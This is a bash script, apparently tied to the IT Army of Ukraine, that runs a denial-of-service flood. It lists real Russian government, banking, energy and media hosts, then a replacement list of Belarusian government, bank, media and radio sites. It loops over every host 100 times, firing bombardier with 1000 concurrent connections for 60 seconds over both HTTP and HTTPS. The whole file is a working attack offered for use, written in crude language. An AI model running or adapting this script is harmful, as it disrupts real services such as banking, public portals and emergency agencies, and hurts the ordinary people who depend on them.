#!/bin/bash

# Best update targets from https://t.me/itarmyofukraine2022
fucklist=(
    "api.sberbank.ru/prod/tokens/v2​/oauth"
    "api.sberbank.ru/prod/tokens/v2​/oidc"
    "api.developer.sber.ru/product/SberbankID"
    "mail.rkn.gov.ru"
    "cloud.rkn.gov.ru" 
    "mvd.gov.ru" 
    "pwd.wto.economy.gov.ru" 
    "stroi.gov.ru"
    "proverki.gov.ru"
    "www.gazprom.ru"
    "lukoil.ru"
    "magnit.ru"
    "www.nornickel.com"
    "www.surgutneftegas.ru"
    "www.tatneft.ru"
    "www.evraz.com"
    "nlmk.com"
    "www.sibur.ru"
    "www.severstal.com"
    "www.metalloinvest.com"
    "nangs.org"
    "rmk"
    "www.tmk"
    "ya.ru"
    "www.polymetalinternational.com"
    "www.uralkali.com"
    "www.eurosib.ru"
    "omk.ru"
    "www.sberbank.ru"
    "www.vtb.ru"
    "www.gazprombank.ru"
    "www.gosuslugi.ru"
    "www.mos.ru"
    "kremlin.ru"
    "government.ru"
    "mil.ru"
    "www.nalog.gov.ru"
    "customs.gov.ru" 
    "pfr.gov.ru"
    "gov.ru"
    "rkn.gov.ru"
    "shop-rt.com"
    "lenta.ru" 
    "ria.ru"
    "tvzvezda.ru"
    "tass.ru"
    "5-tv.ru"
    "rg.ru"
    "rtr-planeta.com"
    "economy.gov.ru" 
    "smotrim.ru"
    "ac.gov.ru" 
    "vgtrk.ru"
    "data.gov.ru"
    "council.gov.ru" 
    "duma.gov.ru"
    "rkn.gov.ru"
    "www.gosuslugi.ru" 
    "www.gov.spb.ru" 
    "kremlin.ru" 
    "mchs.gov.ru"
)

# Latest coordinated list, comment or remove these lines for long-running task
fucklist=(
    "rec.gov.by"
    "belta.by"
    "sputnik.by"
    "www.mil.by"
    "www.government.by"
    "president.gov.by"
    "www.mvd.gov.by"
    "www.kgb.by"
    "www.prokuratura.gov.by"
    "www.nbrb.by"
    "belarusbank.by"
    "brrb.by"
    "www.belapb.by"
    "bankdabrabyt.by"
    "belinvestbank.by"
    "www.tvr.by"
    "www.sb.by"
    "belmarket.by"
    "www.belarus.by"
    "belarus24.by"
    "ont.by"
    "www.024.by"
    "www.belnovosti.by"
    "mogilevnews.by"
    "www.mil.by"
    "yandex.by"
    "www.slonves.by"
    "www.ctv.by"
    "radiobelarus.by"
    "radiusfm.by"
    "alfaradio.by"
    "radiomir.by"
    "radiostalica.by"
    "radiobrestfm.by"
    "www.tvrmogilev.by"
    "minsknews.by"
    "zarya.by"
    "grodnonews.by"
    "bgp.by"
    "www.belneftekhim.by"
    "www.bellegprom.by"
    "www.energo.by"
    "belres.by"
)

for n in {1..100}; do 
    for i in "${fucklist[@]}"
        do
        echo "Fucking - $i"
        bombardier -c 1000 -d 60s -l http://$i --http1
        echo "Switching to https"
        bombardier -c 1000 -d 60s -l https://$i --http1
        echo "Fucked - $i"
        sleep 5
    done
done

